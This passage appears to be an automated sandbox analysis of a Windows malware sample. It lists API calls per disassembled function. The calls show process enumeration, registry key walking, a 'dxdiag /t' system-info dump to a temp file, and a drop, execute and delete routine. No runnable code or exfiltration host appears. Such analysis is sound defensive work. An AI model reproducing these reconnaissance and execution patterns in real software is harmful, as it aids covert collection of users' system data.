                                        • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(0000001B,00000000), ref: 004109DF
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?), ref: 004109F5
                                        • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?), ref: 00410A02
                                          • Part of subcall function 00412DDF: CreateFileW.KERNEL32(73BCF560,80000000,00000003,00000000,00000003,00000080,00000000,00000000,73BCF560,?,00409C9F,00000000), ref: 00412DF9
                                        • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60 ref: 00410A1B
                                        • DeleteFileW.KERNEL32(00000000), ref: 00410A22
                                        • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60 ref: 00410A2F
                                        • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 00410A38
                                        • ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(00000000), ref: 00410A4D
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 00410A57
                                          • Part of subcall function 0040309E: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(?,?,?,00000001,?,?,00000000,00408CAD,00000000), ref: 004030B4
                                          • Part of subcall function 0040309E: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?), ref: 004030C0
                                          • Part of subcall function 0040309E: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,00000000), ref: 004030D5
                                          • Part of subcall function 0040309E: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004030DE
                                        • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(00410D89,?,dat,?,00000000), ref: 00410A7F
                                        • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000), ref: 00410A8A
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00410A98
                                        • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60 ref: 00410AA1
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 00410AB1
                                          • Part of subcall function 00412E4E: ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,00000000,0041BCB0,?,004057B5), ref: 00412E5A
                                          • Part of subcall function 00412E4E: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,004057B5), ref: 00412E64
                                          • Part of subcall function 00412E4E: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00412E78
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00410AC2
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00410ACB
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00410AD4
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00410AE5
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00410AEE
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.664656928.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: V?$allocator@$U?$char_traits@$D@2@@std@@D@std@@$G@std@@$G@2@@std@@$??1?$basic_string@$?c_str@?$basic_string@$??0?$basic_string@$Create$?size@?$basic_string@D@1@@File$?data@?$basic_string@G@1@@G@2@@0@GdipHstd@@ImageStreamV01@@V10@V?$basic_string@$?length@?$basic_string@CompatibleDeleteFromLoadSavemalloc
                                        • String ID: dat$image/png$png
                                        • API String ID: 3276867942-186023265
                                        • Opcode ID: 0153ef338d7b091d17ed8657afde338b7b27d3074362cda7529c0dca2bf5b2ff
                                        • Instruction ID: 6c1464b703b8d6621652859688a13e3a01469ca8af73c80fd23fe2d238e37a16
                                        • Opcode Fuzzy Hash: 0153ef338d7b091d17ed8657afde338b7b27d3074362cda7529c0dca2bf5b2ff
                                        • Instruction Fuzzy Hash: 4F41E87280050DEBCB05EBE0ED5A9EE7B78EF54345B50807AF506A70A1EF745B48CB98
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00409EAA, Relevance: 48.2, APIs: 32, Instructions: 162processCOMMON
                                        Download Yara Rule
                                        APIs
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?), ref: 00409EBB
                                          • Part of subcall function 00412AEB: GetCurrentProcess.KERNEL32(00408F3A,?,?,00408F3A,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 00412AFC
                                        • CreateToolhelp32Snapshot.KERNEL32 ref: 00409ECF
                                        • Process32FirstW.KERNEL32(00000000,?), ref: 00409EF0
                                        • Process32NextW.KERNEL32(00000000,0000022C), ref: 00409EFD
                                        • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(?,?,?,00000000,0000022C,00000000,?,00000002,00000000), ref: 00409F1E
                                          • Part of subcall function 00412B15: OpenProcess.KERNEL32(00000400,00000000,?,?,00409B9F,?), ref: 00412B2B
                                          • Part of subcall function 00412718: _itoa.MSVCRT ref: 00412736
                                          • Part of subcall function 00412718: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(?,?,?,?,?,?,?,0040CC05,?,00000000,0041B310,00000000,0041B310,?), ref: 0041274A
                                          • Part of subcall function 00412B4A: OpenProcess.KERNEL32(00000410,00000000,00409B39,69D8CB60), ref: 00412B5E
                                          • Part of subcall function 00412B4A: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(?,?), ref: 00412BAE
                                          • Part of subcall function 00412855: ?length@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIXZ.MSVCP60(?,?,?,0040CBF0,?,0041BA28,0041B310,?), ref: 00412860
                                          • Part of subcall function 00412855: ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000,?,?,0040CBF0,?,0041BA28,0041B310,?), ref: 0041286C
                                          • Part of subcall function 00412855: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(00000000,?,?,0040CBF0,?,0041BA28,0041B310,?), ref: 00412876
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,?,00000000,?,?,004166F4,00000000,004166F4,00000000,004166F4,00000000,00000002,00000000), ref: 00409F99
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,?,?,004166F4,00000000,004166F4,00000000,004166F4,00000000,00000002,00000000), ref: 00409FA9
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,?,?,004166F4,00000000,004166F4,00000000,004166F4,00000000,00000002,00000000), ref: 00409FB6
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,?,004166F4,00000000,004166F4,00000000,004166F4), ref: 00409FC6
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,004166F4,00000000), ref: 00409FD3
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000), ref: 00409FE3
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 00409FF0
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000), ref: 0040A000
                                        • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 0040A00C
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040A018
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040A021
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040A02D
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040A036
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040A042
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040A04B
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040A057
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040A060
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040A069
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040A075
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040A081
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040A08D
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040A099
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040A0A2
                                        • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040A0B0
                                        • CloseHandle.KERNEL32(00000000,00000000,0000022C,00000000,?,00000002,00000000), ref: 0040A0BF
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,00000002,00000000), ref: 0040A0CC
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040A0D5
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.664656928.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: V?$allocator@$U?$char_traits@$D@std@@$D@2@@std@@$??1?$basic_string@$D@2@@0@Hstd@@V?$basic_string@$??0?$basic_string@G@2@@std@@G@std@@$V10@V10@0@$D@1@@ProcessProcess32$G@1@@NextOpenV01@@$??4?$basic_string@?c_str@?$basic_string@?length@?$basic_string@CloseCreateCurrentFirstHandleSnapshotToolhelp32V01@_itoa
                                        • String ID:
                                        • API String ID: 819894693-0
                                        • Opcode ID: 6d7e0a8e1be64d4d0e255c379d67c754dda12e9502e18d4a3b94b6445093a707
                                        • Instruction ID: 482952a8ea0ca2eb956ab1d6be5e182e2b7f1aefe0fc538246f9d1fd03369c75
                                        • Opcode Fuzzy Hash: 6d7e0a8e1be64d4d0e255c379d67c754dda12e9502e18d4a3b94b6445093a707
                                        • Instruction Fuzzy Hash: B151E07180021EABCB15EBA1ED49EDFB77CAF54345F0040A6B506E3052EB745B89CF65
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0040BB20, Relevance: 47.4, APIs: 26, Strings: 1, Instructions: 191registryCOMMON
                                        Download Yara Rule
                                        APIs
                                        • RegQueryInfoKeyW.ADVAPI32 ref: 0040BB8F
                                        • RegEnumKeyExW.ADVAPI32 ref: 0040BBBE
                                        • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(0041623C,?), ref: 0040BBD4
                                        • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBGABV10@@Z.MSVCP60(?,?,00000000), ref: 0040BBE6
                                        • ??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,0040BE7D,0040C731), ref: 0040BBF4
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,0040BE7D,0040C731), ref: 0040BBFD
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,0040BE7D,0040C731), ref: 0040BC06
                                        • RegEnumValueW.ADVAPI32 ref: 0040BC67
                                        • _itoa.MSVCRT ref: 0040BC7E
                                        • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(0041623C,?,?,0040BE7D,0040C731), ref: 0040BC96
                                        • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBGABV10@@Z.MSVCP60(?,?,00000000,?,0040BE7D,0040C731), ref: 0040BCA8
                                        • ??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,0040BE7D,0040C731), ref: 0040BCB6
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,0040BE7D,0040C731), ref: 0040BCBF
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,0040BE7D,0040C731), ref: 0040BCCB
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00415770,?,?,?,?,?,0040BE7D,0040C731), ref: 0040BCE0
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,?,00000000,?,?,?,?,0040BE7D,0040C731), ref: 0040BCEF
                                        • ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,0040BE7D,0040C731), ref: 0040BCFD
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,0040BE7D,0040C731), ref: 0040BD06
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,0040BE7D,0040C731), ref: 0040BD12
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([regsplt],?,?,?,?,?,?,?,?,0040BE7D,0040C731), ref: 0040BD27
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(?,?,?,00000000,?,?,?,?,?,?,?,0040BE7D,0040C731), ref: 0040BD42
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,0040BE7D,0040C731), ref: 0040BD50
                                        • ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,0040BE7D,0040C731), ref: 0040BD5E
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,0040BE7D,0040C731), ref: 0040BD6A
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,0040BE7D,0040C731), ref: 0040BD76
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,0040BE7D,0040C731), ref: 0040BD82
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.664656928.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: V?$allocator@$U?$char_traits@$D@std@@$D@2@@std@@G@std@@$??1?$basic_string@$G@2@@std@@$??0?$basic_string@$Hstd@@V01@V01@@V?$basic_string@Y?$basic_string@$D@1@@V10@@$D@2@@0@EnumG@1@@G@2@@0@$InfoQueryV10@0@Value_itoa
                                        • String ID: [regsplt]
                                        • API String ID: 2158026845-4262303796
                                        • Opcode ID: d9600deca0114169be820806fb040204145dfb535b1c51802269c8b32ea854a1
                                        • Instruction ID: 89d9bd96600c6e247975aaf8b0d3d97a5ae7f77b1b3f2a4fe7097baafbd20519
                                        • Opcode Fuzzy Hash: d9600deca0114169be820806fb040204145dfb535b1c51802269c8b32ea854a1
                                        • Instruction Fuzzy Hash: C971977290021EEBDB11DBD0DD89DEEBB7DEF48345F004166E606A2150EB745A89CFA8
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0040EFB5, Relevance: 47.4, APIs: 24, Strings: 3, Instructions: 120filesynchronizationCOMMON
                                        Download Yara Rule
                                        APIs
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00415774,?,?,?,?), ref: 0040EFD0
                                        • getenv.MSVCRT ref: 0040EFDC
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,00000000,?), ref: 0040EFE8
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040EFF5
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040F000
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040F009
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000010,00000001), ref: 0040F016
                                        • ??0?$basic_ofstream@DU?$char_traits@D@std@@@std@@QAE@PBDH@Z.MSVCP60(00000000), ref: 0040F023
                                        • ?is_open@?$basic_ofstream@DU?$char_traits@D@std@@@std@@QBE_NXZ.MSVCP60 ref: 0040F02F
                                        • ??6std@@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@0@AAV10@ABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@@Z.MSVCP60(?,?), ref: 0040F048
                                        • ?close@?$basic_ofstream@DU?$char_traits@D@std@@@std@@QAEXXZ.MSVCP60 ref: 0040F055
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 0040F074
                                        • ShellExecuteExA.SHELL32(0000003C), ref: 0040F091
                                        • WaitForSingleObject.KERNEL32(?,000000FF,00000070), ref: 0040F0C9
                                        • CloseHandle.KERNEL32(?), ref: 0040F0D2
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 0040F0DB
                                        • DeleteFileA.KERNEL32(00000000), ref: 0040F0E2
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00415664,?), ref: 0040F0B5
                                          • Part of subcall function 004020C2: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,0041BE70,?,0040CF62,0000004B), ref: 004020D1
                                          • Part of subcall function 004020C2: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004020E7
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00415664,?,?,?,?,?), ref: 0040F0FC
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00415664,?), ref: 0040F116
                                        • ??_D?$basic_ofstream@DU?$char_traits@D@std@@@std@@QAEXXZ.MSVCP60(0000006F), ref: 0040F12E
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?), ref: 0040F137
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?), ref: 0040F140
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?), ref: 0040F149
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.664656928.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: U?$char_traits@$V?$allocator@$D@std@@$D@2@@std@@$??1?$basic_string@$??0?$basic_string@$D@1@@D@std@@@std@@$?c_str@?$basic_string@V?$basic_string@$D@2@@0@Hstd@@$??0?$basic_ofstream@??6std@@?close@?$basic_ofstream@?is_open@?$basic_ofstream@CloseD?$basic_ofstream@D@2@@0@@D@std@@@0@DeleteExecuteFileHandleObjectShellSingleV01@@V10@V10@0@V10@@V?$basic_ostream@Waitgetenv
                                        • String ID: <$@$Temp
                                        • API String ID: 2271834883-1032778388
                                        • Opcode ID: 3e18fcf380e9c6a75fe0b1eb03ac786eb708855d67b319b098a75e6bb2087f94
                                        • Instruction ID: 888aea03b1af4e5dcc25ad03cf8797eeef26072084273f227dd45585e2e759a8
                                        • Opcode Fuzzy Hash: 3e18fcf380e9c6a75fe0b1eb03ac786eb708855d67b319b098a75e6bb2087f94
                                        • Instruction Fuzzy Hash: E541407190061DEBDB10EFE0DC4AAEE7B79EF44701F10403AF502A6190DBB45A89CF99
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0040E927, Relevance: 45.6, APIs: 21, Strings: 5, Instructions: 121sleepfileCOMMON
                                        Download Yara Rule
                                        APIs
                                        • _wgetenv.MSVCRT ref: 0040E93E
                                        • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(00000000,00000000), ref: 0040E949
                                        • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000), ref: 0040E954
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040E95F
                                        • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBGABV10@@Z.MSVCP60(?,/t ,?,00000000,00000000), ref: 0040E976
                                        • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?,00000000,00000000), ref: 0040E980
                                        • ShellExecuteW.SHELL32(00000000,open,dxdiag,00000000,?,00000000), ref: 0040E992
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,00000000,00000000), ref: 0040E99B
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,?,00000000,00000000), ref: 0040E9A8
                                        • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?,?,00000000,00000000), ref: 0040E9B7
                                          • Part of subcall function 00412DDF: CreateFileW.KERNEL32(73BCF560,80000000,00000003,00000000,00000003,00000080,00000000,00000000,73BCF560,?,00409C9F,00000000), ref: 00412DF9
                                        • Sleep.KERNEL32(00000064,00000000,00000000), ref: 0040E9C7
                                        • ?empty@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE_NXZ.MSVCP60 ref: 0040E9D1
                                        • ?empty@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE_NXZ.MSVCP60 ref: 0040E9E6
                                        • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60 ref: 0040E9F7
                                        • DeleteFileW.KERNEL32(00000000), ref: 0040E9FE
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,?,0041B310,?), ref: 0040EA3C
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?), ref: 0040EA46
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(00000097,?,?,?,?,?,?), ref: 0040EA5E
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?), ref: 0040EA77
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?), ref: 0040EA80
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?), ref: 0040EA89
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.664656928.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: V?$allocator@$U?$char_traits@$G@std@@$D@std@@$G@2@@std@@$??1?$basic_string@D@2@@std@@$Hstd@@V?$basic_string@$?c_str@?$basic_string@$??0?$basic_string@?empty@?$basic_string@D@2@@0@FileG@2@@0@V10@0@$CreateD@1@@DeleteExecuteG@1@@ShellSleepV10@V10@@_wgetenv
                                        • String ID: /t $\sysinfo.txt$dxdiag$open$temp
                                        • API String ID: 1966616101-2001430897
                                        • Opcode ID: ff0e39e396bbf46ea60dadb1ea34f8f26dedf6304284c23b1de840788f93d481
                                        • Instruction ID: 1c5eb7ae2d6a6dc7204c520a9e58a8966c6b8e2557f2cc0bdb06ecab60d4e380
                                        • Opcode Fuzzy Hash: ff0e39e396bbf46ea60dadb1ea34f8f26dedf6304284c23b1de840788f93d481
                                        • Instruction Fuzzy Hash: 0D41657280050DEFCB04EBE0ED4ADEEB77CEE54345B10402AF912A3091EB755A49CB69
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0040A370, Relevance: 44.0, APIs: 20, Strings: 5, Instructions: 205COMMON
                                        Download Yara Rule
                                        APIs
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 0040A383
                                        • SetEvent.KERNEL32(?), ref: 0040A38C
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 0040A395
                                        • ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP60(?,00000004,69D65DF0), ref: 0040A3AD
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(0041B310), ref: 0040A3BE
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 0040A3CD
